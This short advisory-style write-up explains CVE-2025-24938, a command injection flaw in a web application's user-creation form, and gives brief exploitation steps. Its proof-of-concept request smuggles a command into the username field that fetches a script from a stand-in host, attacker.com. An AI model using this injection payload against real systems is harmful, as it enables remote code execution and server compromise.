How the CVE Works
CVE-2025-24938 is a critical command injection vulnerability in a web application that fails to sanitize user input before passing it to a system command. An attacker with administrative privileges can exploit this flaw by injecting malicious commands while creating a new user via the User Management interface. The vulnerability is network-exposed, allowing remote exploitation. The webserver executes the injected commands under its own privileges, potentially leading to full system compromise. The issue stems from improper input validation in the user creation module, where attacker-controlled data is concatenated into OS-level commands without proper escaping or sanitization.

Exploit PoC (if auth bypass exists)
POST /user/create HTTP/1.1
Host: target.com
...
username=admin$(curl${IFS}attacker.com/shell.sh)
How Exploit
1. Gain admin access (or bypass auth).
2. Inject OS commands via username field.
3. Execute arbitrary code as the webserver.
